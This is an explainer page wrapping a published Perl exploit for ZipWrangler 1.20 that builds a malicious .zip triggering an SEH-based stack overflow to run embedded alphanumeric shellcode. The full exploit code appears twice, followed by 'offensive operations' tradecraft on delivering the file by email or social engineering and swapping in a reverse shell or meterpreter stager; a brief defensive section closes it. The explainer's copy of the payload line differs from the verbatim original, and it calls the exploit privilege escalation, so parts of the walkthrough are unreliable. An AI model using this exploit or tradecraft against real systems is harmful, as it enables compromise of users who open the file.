ZipWrangler 1.20 SEH Exploit Explained

ZipWrangler 1.20 SEH Exploit Explained
What this paper is
This paper details a local privilege escalation vulnerability in ZipWrangler version 1.20. Specifically, it describes a Stack-based buffer overflow that can be triggered by a specially crafted .zip file. The exploit leverages Structured Exception Handling (SEH) overwriting to gain control of the program's execution flow, ultimately leading to the execution of arbitrary shellcode. The exploit is written in Perl and targets Windows XP SP3 English on a VMWare platform.
Simple technical breakdown
The vulnerability lies in how ZipWrangler handles .zip files. When processing a malformed archive, a buffer overflow occurs. This overflow allows an attacker to overwrite critical control flow information on the stack, including the SEH handler address. By carefully crafting the overflow data, the attacker can redirect the program's execution to their own malicious code (shellcode) when an exception occurs. The exploit constructs a .zip file that, when opened by ZipWrangler, triggers this overflow and executes the embedded shellcode.
Complete code and payload walkthrough
The provided Perl script constructs a malicious .zip file designed to exploit ZipWrangler 1.20. Let's break down the code and its components:
1. Header Information and Greetz:
#!/usr/bin/perl
# Title: ZipWrangler 1.20 (.zip) SEH 0day exploit
# Author: TecR0c & Sud0
# Date: April 24th, 2010
# Corelan Reference: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-031
# Download: http://www.softpedia.com/get/Compression-tools/ZipWrangler.shtml
# Platform: Windows XP sp3 En (VMWARE)
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.- Purpose: This section contains metadata about the exploit, including its title, authors, publication date, references, target platform, and disclaimers. It's standard practice for exploit scripts to include this information.
- Practical Purpose: For an offensive team, this provides context about the exploit's origin, its intended target, and any associated advisories.
2. ASCII Art Banner:
print "|-------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |\n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |\n";
print "| |\n";
print "| http://www.corelan.be:8800 |\n";
print "| security@corelan.be |\n";
print "| |\n";
print "|-------------------------------------------------[ EIP Hunters ]---|\n";
print " [+] ZipWrangler 1.2 (.zip) SEH exploit\n";- Purpose: This prints a decorative banner to the console when the script is executed, displaying the exploit's name and the Corelan website.
- Practical Purpose: Purely cosmetic, but helps identify the script's output.
3. Local File Header (ldf_header):
my $ldf_header = "\x50\x4B\x03\x04". # local signature
"\x14\x00". # version minimum needed to extract
"\x00\x00". #general purpose bit flag
"\x00\x00". #compression method
"\xB7\xAC". #file last modification time
"\xCE\x34". # file last modification date
"\x00\x00\x00\x00". #CRC32
"\x00\x00\x00\x00". #Compressed size
"\x00\x00\x00\x00" . #Uncompressed Size
"\x48\x10" .# filename length E4 0F
"\x00\x00"; #Extra filed length- Purpose: This variable defines the bytes for the "Local File Header" signature of a
.zipfile. This header describes a file within the archive.\x50\x4B\x03\x04: The standard signature for a local file header.\x14\x00: Version needed to extract (version 2.0).\x00\x00: General purpose bit flag (no flags set).\x00\x00: Compression method (stored, not compressed).\xB7\xAC\xCE\x34: File last modification time and date (arbitrary values).\x00\x00\x00\x00: CRC32 checksum (placeholder).\x00\x00\x00\x00: Compressed size (placeholder).\x00\x00\x00\x00: Uncompressed size (placeholder).\x48\x10: Filename length (0x1048, which is 4168 bytes). This is a crucial part for the overflow.\x00\x00: Extra field length (0 bytes).
- Practical Purpose: This sets up the initial structure of a valid
.zipfile entry. The large filename length is a key component in triggering the overflow.
4. Central Directory File Header (cdf_header):
my $cdf_header = "\x50\x4B\x01\x02".#Signature
"\x14\x00".#version made by
"\x14\x00".#version needed to extract
"\x00\x00".#general purpose bit flag
"\x00\x00".#Compression method
"\xB7\xAC".#File last modification time
"\xCE\x34".#File last modification date
"\x00\x00\x00\x00". #CRC32
"\x00\x00\x00\x00".#Compressed Size
"\x00\x00\x00\x00".#Uncompressed Size#
"\x48\x10". # filename length
"\x00\x00". #Extra Field Length
"\x00\x00". #File comment length
"\x00\x00". #Disk number where File starts
"\x01\x00". #Internal File Attributes
"\x24\x00\x00\x00". #External File Attributes
"\x00\x00\x00\x00"; #Relative offset of local file header;- Purpose: This variable defines the bytes for the "Central Directory File Header" signature. This header provides metadata about files in the archive and is used for listing contents and for the central directory structure.
\x50\x4B\x01\x02: The standard signature for a central directory file header.\x14\x00: Version made by (version 2.0).\x14\x00: Version needed to extract (version 2.0).\x00\x00: General purpose bit flag.\x00\x00: Compression method.\xB7\xAC\xCE\x34: File last modification time and date.\x00\x00\x00\x00: CRC32 checksum.\x00\x00\x00\x00: Compressed size.\x00\x00\x00\x00: Uncompressed size.\x48\x10: Filename length (0x1048, same as local header).\x00\x00: Extra field length.\x00\x00: File comment length.\x00\x00: Disk number where file starts.\x01\x00: Internal file attributes.\x24\x00\x00\x00: External file attributes.\x00\x00\x00\x00: Relative offset of local file header (placeholder).
- Practical Purpose: This is part of the standard
.zipfile structure. It complements the local file header and is necessary for a valid archive.
5. End of Central Directory Header (eofcdf_header):
my $eofcdf_header = "\x50\x4B\x05\x06". #End of central Directory Signature
"\x00\x00". #Number of this disk
"\x00\x00". #Disk where central directory starts
"\x01\x00". #Number of central directory records on this Disk
"\x01\x00". #Total Number of central directory records
"\x76\x10\x00\x00". #Size of central directory (bytes) (central directory header size + payload)
"\x66\x10\x00\x00". # Offset of start of central directory, relative to start archive (lfh + payload)
"\x00\x00"; #Zip file Comment length;- Purpose: This variable defines the bytes for the "End of Central Directory" record, which marks the end of the central directory structure in a
.zipfile.\x50\x4B\x05\x06: The standard signature for the End of Central Directory record.\x00\x00: Number of this disk.\x00\x00: Disk where central directory starts.\x01\x00: Number of central directory records on this disk.\x01\x00: Total number of central directory records.\x76\x10\x00\x00: Size of central directory in bytes (0x1076, 4214 bytes). This value is calculated based on the size of the central directory headers and the payload.\x66\x10\x00\x00: Offset of start of central directory relative to the start of the archive (0x1066, 4198 bytes). This points to where the central directory begins.\x00\x00: Zip file comment length.
- Practical Purpose: This is essential for a valid
.zipfile, allowing archive utilities to locate the central directory. The size and offset values are critical for the integrity of the archive structure.
6. Exploit Logic and Comments:
# mov edx, ds :[EAX] ---> the address 0x7FFDFD0C = 00000 in DS
# so EDX=0000, next instruction TEST EDX,EDX / Jz xxxxxx (will bypass the error due to mov ECX, ds:[edx])
# the jump will take us to a retn (so we are out from handler routine) --> come back to execution
# 0x77E9025B [rpcrt4.dll] will overwrite EIP after being back from exception
# bingo , after \xEB\x06 we are in our \xcc
# shell = message box eax e- Purpose: These are comments explaining the intended exploit mechanism.
- The comments describe how an exception handler is bypassed. When an exception occurs, the program attempts to read from
ds:[EAX]. IfEAXpoints to0x7FFDFD0C(which is interpreted as00000in the Data Segment),EDXbecomes0. - The instruction
TEST EDX, EDXfollowed by a jump (Jz) would then skip an instruction that would cause an error (likelymov ECX, ds:[edx]). - This jump leads to a
retn(return) instruction, effectively exiting the exception handler cleanly. - The exploit then aims to redirect execution to an address within
rpcrt4.dll(0x77E9025B), which is a common technique to gain control after an SEH exception. - The comment
\xEB\x06 we are in our \xccsuggests that a short jump (\xEB\x06) is used to land on the subsequent\xcc(INT 3, breakpoint) instructions, which are part of the shellcode. shell = message box eax eindicates the shellcode's purpose is to display a message box.
- The comments describe how an exception handler is bypassed. When an exception occurs, the program attempts to read from
- Practical Purpose: This is the core of the SEH exploitation strategy. Understanding these comments is crucial for debugging and adapting the exploit. It highlights the reliance on specific DLLs and memory addresses, which can be susceptible to ASLR or DEP if not properly handled.
7. Shellcode (shell and shellcode variables):
my $shell="PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8" .
"ABuJIn9JKmK9IT4tdl4tqzrmbpzUaIYcTNkpqfPlKD66lNkpvwlLKsvgx" .
"lKsNepNkEf4xpO4XPul3qIs1KaKOKQapLK2LgT14lKsuUlNkpTgurX6aZ" .
"JLK1ZwhLKCjepUQzKm3p7W9LKp4nkwqzNp1kOvQKpKLLlmTo0BTTJZahO4" .
"MuQKwxihqKOKOIoWKQlQ4Ux2UyNNkcjq4uQJKsVNk6lpKnkrzuL5QXkLKV" .
"dNkWqM8K9qT5tglE1XC82C8EyYDNi8eMY9RCXlNpN4NhlbryxMLKOKOKOl" .
"IqUfdOKQnN8YrPsMW7lddV2KXlKIoyoKOoycueXQxplPlEpkO3XP3VRfNu" .
"4qxpupscUcBK8qLutWzOyIvpVyoaEETMYO2pPMkoXY22mOLOwwlWTf2kXa" .
"NKOYokOSXPlpapnV83XQsbOT255P1kkoxaLQ4TGniKSBHQtShWPUpax0op" .
"iCD55PhpeqhRPbLUaJiNh2lEteYOykQdqKbSbQCv12rKOXP6QO0pPKOSeV" .
"h5ZA";
my $shellcode="A" x 2 . $shell . "A" x (4080-2-length($shell)) . "\x0C\xFD\xFD\x7F" . "\x90" x 4 . "\x83\xC0\x16\xFF\xE0"."\xcc" x 59;- Purpose: This section defines the actual shellcode that will be executed.
$shell: This string contains the main part of the shellcode. The characters are encoded bytes that, when executed, perform the desired action (displaying a message box). The specific encoding is a form of alphanumeric shellcode, often used to bypass simple signature-based detection.$shellcode: This variable constructs the complete payload that will be embedded within the.zipfile."A" x 2: Two 'A' characters, likely padding.$shell: The main shellcode."A" x (4080-2-length($shell)): This is the buffer overflow padding. It fills the remaining space in the buffer up to a certain size (4080 bytes in this case, minus the two 'A's and the length of$shell). This padding is crucial to reach the SEH overwrite."\x0C\xFD\xFD\x7F": This is the SEH overwrite. It's a pointer to the attacker's controlled code.0x7FFDFD0Cis a memory address. In this context, it's likely intended to point to a location within the crafted.zipfile's data that will be executed. The bytes are reversed due to little-endian architecture."\x90" x 4: Four NOP (No Operation) instructions. These are often used as a "landing pad" to ensure execution continues smoothly if the exact jump target is slightly off."\x83\xC0\x16\xFF\xE0": This sequence is likely a small piece of assembly code.\x83\xC0\x16:ADD EAX, 0x16(Add 16 to EAX).\xFF\xE0:JMP EAX(Jump to the address in EAX). This is a common way to execute shellcode by jumping to a calculated address.
"\xcc" x 59: Fifty-nineINT 3(breakpoint) instructions. These are often used as placeholders or to pad the shellcode to a specific size. They will cause a crash if executed directly, but the exploit aims to jump over them to the actual shellcode.
- Practical Purpose: This is the payload. Understanding the shellcode's function (e.g., message box, reverse shell, command execution) is paramount. The padding and SEH overwrite are critical for successful exploitation. The
\x90and\xccbytes are common in shellcode for alignment and control flow.
8. Filename and Payload Construction:
my $filename="wrangler.zip";
my $payload = $shellcode . ".txt";
print "Size : " . length($payload)."\n";
print "Removing old $filename file\n";
system("del $filename");
print "Creating new $filename file\n";
open(FILE, ">$filename");
print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
close(FILE);- Purpose: This section defines the output filename, constructs the final payload by appending
.txtto the shellcode (likely to make it appear as a text file within the zip, though the exploit targets the zip structure itself), and then writes the complete.zipfile.my $filename="wrangler.zip";: Sets the name of the output malicious zip file.my $payload = $shellcode . ".txt";: Concatenates the constructed shellcode with.txt. This is a common tactic to make the embedded file appear benign.print "Size : " . length($payload)."\n";: Prints the total size of the constructed payload.print "Removing old $filename file\n"; system("del $filename");: Deletes any existingwrangler.zipfile to ensure a clean creation.print "Creating new $filename file\n"; open(FILE, ">$filename");: Opens a new file namedwrangler.zipin write mode.print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;: This is the core file writing operation. It concatenates the local file header, the constructed payload (shellcode + padding + SEH overwrite + NOPs + jump + breakpoints), the central directory header, the payload again, and finally the end of central directory header. This creates a valid-looking.zipfile with the exploit embedded.close(FILE);: Closes the file handle.
- Practical Purpose: This is the script's execution phase. It generates the exploit artifact. The order of concatenation is critical for the
.zipfile's structure. The payload is inserted where the file's data would normally be.
Mapping list:
#!/usr/bin/perl: Shebang line, indicates the script should be executed with Perl.- Comments (
# ...): Explanations, metadata, and exploit logic descriptions. print "...": Console output for user feedback.my $ldf_header = ...: Defines the bytes for the Local File Header of a.zipentry.my $cdf_header = ...: Defines the bytes for the Central Directory File Header of a.zipentry.my $eofcdf_header = ...: Defines the bytes for the End of Central Directory record.- Exploit Logic Comments (
# mov edx, ds :[EAX] ...): Explains the SEH overwrite and exception handling bypass. my $shell = "...": The primary alphanumeric shellcode.my $shellcode = "A" x 2 . $shell . "A" x (4080-2-length($shell)) . "\x0C\xFD\xFD\x7F" . "\x90" x 4 . "\x83\xC0\x16\xFF\xE0"."\xcc" x 59;: Constructs the full exploit payload, including padding, SEH pointer, NOPs, jump instruction, and breakpoints.my $filename="wrangler.zip";: Sets the output filename.my $payload = $shellcode . ".txt";: Appends.txtto the shellcode for obfuscation.system("del $filename");: Command to delete the existing exploit file.open(FILE, ">$filename");: Opens the output file for writing.print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;: Writes the complete.zipfile structure to disk.close(FILE);: Closes the output file.
Practical details for offensive operations teams
- Required Access Level: Local access to the target machine is required to execute the Perl script and create the malicious
.zipfile. The target application (ZipWrangler 1.20) must be installed and accessible. - Lab Preconditions:
- A Windows XP SP3 English virtual machine is ideal for testing and replicating the original exploit conditions.
- The ZipWrangler 1.20 application must be installed on the target VM.
- Perl interpreter must be installed on the attacker's machine (or the machine used to generate the exploit file).
- Tooling Assumptions:
- Perl: Required to run the exploit script.
- Hex editor/Debugger: Useful for analyzing the generated
.zipfile and the shellcode. Tools like HxD, IDA Pro, or WinDbg would be beneficial. - VMware: The exploit explicitly mentions VMWare, suggesting it was tested in a virtualized environment.
- Execution Pitfalls:
- Version Specificity: The exploit is highly specific to ZipWrangler 1.20. Any patch or update to the application will likely render it ineffective.
- SEH Overwrite Address: The address
0x7FFDFD0Cis hardcoded. This address might change due to ASLR (Address Space Layout Randomization) or DEP (Data Execution Prevention) if they are enabled on the target system, though these were less prevalent or robust on Windows XP. If the address is invalid or points to non-executable memory, the exploit will fail. - Buffer Size: The padding calculation (
4080-2-length($shell)) is critical. If the buffer size is miscalculated, the SEH overwrite will not occur correctly. - Antivirus/EDR: Modern security solutions might detect the shellcode or the
.zipfile structure as malicious. - File Handling: The exploit relies on the user opening the
wrangler.zipfile with ZipWrangler. Social engineering or other methods might be needed to ensure the target user performs this action. - Exception Handling: The exploit relies on an exception occurring during the processing of the
.zipfile. If the application's error handling changes, this exploit path might be broken.
- Tradecraft Considerations:
- Delivery: The
.zipfile needs to be delivered to the target. This could be via email attachment, shared drive, or other means. - Obfuscation: The
.txtextension appended to the payload is a basic form of obfuscation. More advanced techniques might be needed for evasion. - Payload Customization: The current shellcode displays a message box. For actual offensive operations, this would be replaced with a more functional payload (e.g., a reverse shell, a meterpreter stager).
- Reconnaissance: Confirming the exact version of ZipWrangler and the operating system is crucial before attempting deployment.
- Delivery: The
Where this was used and when
- When: This exploit was published on April 24th, 2010. It targets a vulnerability that existed in ZipWrangler 1.20 prior to this date.
- Where: The exploit is a "local" exploit, meaning it requires an attacker to have initial access to the target machine to run the Perl script and create the malicious
.zipfile. The target application, ZipWrangler, is a compression utility. Therefore, this exploit would have been used in scenarios where an attacker already had a foothold on a Windows XP SP3 system and wanted to escalate privileges or gain further control by exploiting a vulnerability in a commonly used utility. The reference to Corelan Security Team suggests it was discovered and disclosed by them.
Defensive lessons for modern teams
- Software Version Management: Regularly patching and updating all software, especially file archive utilities, is paramount. This exploit targets a specific, older version.
- Input Validation: Applications that process untrusted file formats (like
.zip) must rigorously validate input sizes and structures to prevent buffer overflows. - SEH Protection: Modern operating systems and compilers offer protections against SEH overwrites, such as SEHOP (Structured Exception Handling Overwrite Protection) in Windows. However, older systems like Windows XP lack these robust defenses.
- Memory Safety: Developers should prioritize memory-safe programming languages or employ secure coding practices to avoid buffer overflows.
- Application Whitelisting: Implementing application whitelisting can prevent unauthorized executables (like the generated
wrangler.zipif it contained an executable payload) from running. - Endpoint Detection and Response (EDR): EDR solutions can detect suspicious file creation, shellcode execution patterns, and unusual API calls associated with exploits.
- Least Privilege: Running applications with the minimum necessary privileges can limit the impact of a successful local privilege escalation exploit.
ASCII visual (if applicable)
This exploit's core mechanism involves manipulating the program's execution flow on the stack when an exception occurs. A simplified visual representation of the stack and control flow can be helpful:
+---------------------+
| ... |
+---------------------+
| Return Address | <-- Normally points to the next instruction after the function call
+---------------------+
| Saved Frame Ptr |
+---------------------+
| Local Variables |
| (Buffer) | <-- This is where the overflow happens
+---------------------+
| SEH Handler Address | <-- Overwritten by the exploit (e.g., 0x7FFDFD0C)
+---------------------+
| ... |
+---------------------+When an exception occurs:
- The program looks for an SEH handler address on the stack.
- The exploit overwrites this address with a pointer to its shellcode.
- The program attempts to execute the handler, which is now the attacker's code.
Original Flow:
[Function Call] --> [Function Body] --> [Buffer Overflow] --> [Exception Occurs] --> [SEH Handler (Legitimate)] --> [Return]
Exploit Flow:
[Function Call] --> [Function Body] --> [Buffer Overflow] --> [Exception Occurs] --> [SEH Handler (Overwritten)] --> [Shellcode Execution] --> [Controlled Execution]Source references
- Paper ID: 12368
- Paper Title: ZipWrangler 1.20 - '.zip' File (SEH)
- Author: TecR0c & Sud0
- Published: 2010-04-24
- Keywords: Windows, local
- Paper URL: https://www.exploit-db.com/papers/12368
- Raw URL: https://www.exploit-db.com/raw/12368
- Corelan Reference: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-031
Original Exploit-DB Content (Verbatim)
#!/usr/bin/perl
# Title: ZipWrangler 1.20 (.zip) SEH 0day exploit
# Author: TecR0c & Sud0
# Date: April 24th, 2010
# Corelan Reference: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-031
# Download: http://www.softpedia.com/get/Compression-tools/ZipWrangler.shtml
# Platform: Windows XP sp3 En (VMWARE)
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
print "|-------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |\n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |\n";
print "| |\n";
print "| http://www.corelan.be:8800 |\n";
print "| security@corelan.be |\n";
print "| |\n";
print "|-------------------------------------------------[ EIP Hunters ]---|\n";
print " [+] ZipWrangler 1.2 (.zip) SEH exploit\n";
my $ldf_header = "\x50\x4B\x03\x04". # local signature
"\x14\x00". # version minimum needed to extract
"\x00\x00". #general purpose bit flag
"\x00\x00". #compression method
"\xB7\xAC". #file last modification time
"\xCE\x34". # file last modification date
"\x00\x00\x00\x00". #CRC32
"\x00\x00\x00\x00". #Compressed size
"\x00\x00\x00\x00" . #Uncompressed Size
"\x48\x10" .# filename length E4 0F
"\x00\x00"; #Extra filed length
my $cdf_header = "\x50\x4B\x01\x02". #Signature
"\x14\x00".#version made by
"\x14\x00".#version needed to extract
"\x00\x00".#general purpose bit flag
"\x00\x00".#Compression method
"\xB7\xAC".#File last modification time
"\xCE\x34".#File last modification date
"\x00\x00\x00\x00". #CRC32
"\x00\x00\x00\x00".#Compressed Size
"\x00\x00\x00\x00".#Uncompressed Size#
"\x48\x10". # filename length
"\x00\x00". #Extra Field Length
"\x00\x00". #File comment length
"\x00\x00". #Disk number where File starts
"\x01\x00". #Internal File Attributes
"\x24\x00\x00\x00". #External File Attributes
"\x00\x00\x00\x00"; #Relative offset of local file header;
my $eofcdf_header = "\x50\x4B\x05\x06". #End of central Directory Signature
"\x00\x00". #Number of this disk
"\x00\x00". #Disk where central directory starts
"\x01\x00". #Number of central directory records on this Disk
"\x01\x00". #Total Number of central directory records
"\x76\x10\x00\x00". #Size of central directory (bytes) (central directory header size + payload)
"\x66\x10\x00\x00". # Offset of start of central directory, relative to start archive (lfh + payload)
"\x00\x00"; #Zip file Comment length;
# mov edx, ds :[EAX] ---> the address 0x7FFDFD0C = 00000 in DS
# so EDX=0000, next instruction TEST EDX,EDX / Jz xxxxxx (will bypass the error due to mov ECX, ds:[edx])
# the jump will take us to a retn (so we are out from handler routine) --> come back to execution
# 0x77E9025B [rpcrt4.dll] will overwrite EIP after being back from exception
# bingo , after \xEB\x06 we are in our \xcc
# shell = message box eax e
my $shell="PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8" .
"ABuJIn9JKmK9IT4tdl4tqzrmbpzUaIYcTNkpqfPlKD66lNkpvwlLKsvgx" .
"lKsNepNkEf4xpO4XPul3qIs1KaKOKQapLK2LgT14lKsuUlNkpTgurX6aZ" .
"JLK1ZwhLKCjepUQzKm3p7W9LKp4nkwqzNp1kOvQKpKLLlmTo0BTTJZahO4" .
"MuQKwxihqKOKOIoWKQlQ4Ux2UyNNkcjq4uQJKsVNk6lpKnkrzuL5QXkLKV" .
"dNkWqM8K9qT5tglE1XC82C8EyYDNi8eMY9RCXlNpN4NhlbryxMLKOKOKOl" .
"IqUfdOKQnN8YrPsMW7lddV2KXlKIoyoKOoycueXQxplPlEpkO3XP3VRfNu" .
"4qxpupscUcBK8qLutWzOyIvpVyoaEETMYO2pPMkoXY22mOLOwwlWTf2kXa" .
"NKOYokOSXPlpapnV83XQsbOT255P1kkoxaLQ4TGniKSBHQtShWPUpax0op" .
"iCD55PhpeqhRPbLUaJiNh2lEteYOykQdqKbSbQCv12rKOXP6QO0pPKOSeV" .
"h5ZA";
my $shellcode="A" x 2 . $shell . "A" x (4080-2-length($shell)) . "\x0C\xFD\xFD\x7F" . "\x90" x 4 . "\x5b\x02\xe9\x77" . "\x90" x 8 . "\x83\xC0\x16\xFF\xE0"."\xcc" x 59;
my $filename="wrangler.zip";
my $payload = $shellcode . ".txt";
print "Size : " . length($payload)."\n";
print "Removing old $filename file\n";
system("del $filename");
print "Creating new $filename file\n";
open(FILE, ">$filename");
print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
close(FILE);